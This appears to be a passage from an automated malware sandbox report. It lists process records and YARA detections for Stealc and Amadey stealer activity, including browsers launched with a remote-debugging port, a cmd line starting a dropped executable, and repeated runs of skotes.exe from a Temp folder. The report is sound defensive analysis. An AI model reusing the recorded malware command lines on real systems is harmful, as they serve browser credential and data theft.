                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2593879213.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2588765991.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                        Start time:18:49:15
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                        Start time:18:49:16
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2320,i,9541969784439426641,9290128447048775784,262144 /prefetch:8
                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                        Start time:18:49:26
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                        Start time:18:49:26
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2292,i,7521651601030041477,18299988415420470262,262144 /prefetch:3
                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                        Start time:18:49:26
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                        Start time:18:49:27
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:3
                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                        Start time:18:49:30
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6368 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                        Start time:18:49:31
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6656 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                        Start time:18:49:55
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAFHDBGHJK.exe"
                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                        Start time:18:49:55
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                        Start time:18:49:55
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\DocumentsCAFHDBGHJK.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\DocumentsCAFHDBGHJK.exe"
                                                                                                                                                                                                                                                        Imagebase:0xe80000
                                                                                                                                                                                                                                                        File size:1'916'416 bytes
                                                                                                                                                                                                                                                        MD5 hash:FBE6E564AF67243480309BCB73FD7856
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.2613893596.0000000000E81000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000003.2573401397.0000000005660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                        Start time:18:49:57
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                                                                                                                        File size:1'916'416 bytes
                                                                                                                                                                                                                                                        MD5 hash:FBE6E564AF67243480309BCB73FD7856
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2640022195.00000000002D1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000003.2599153085.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                        Start time:18:49:57
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                                                                                                                        File size:1'916'416 bytes
                                                                                                                                                                                                                                                        MD5 hash:FBE6E564AF67243480309BCB73FD7856
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000003.2599736204.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.2640421904.00000000002D1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                        Start time:18:50:27
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6540 --field-trial-handle=2236,i,13588427511518387819,9522602448328524199,262144 /prefetch:8
                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                        Start time:18:51:00
                                                                                                                                                                                                                                                        Start date:20/11/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        Imagebase:0x2d0000
                                                                                                                                                                                                                                                        File size:1'916'416 bytes
                                                                                                                                                                                                                                                        MD5 hash:FBE6E564AF67243480309BCB73FD7856
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000003.3216524744.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000002.3299451123.00000000002D1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        No disassembly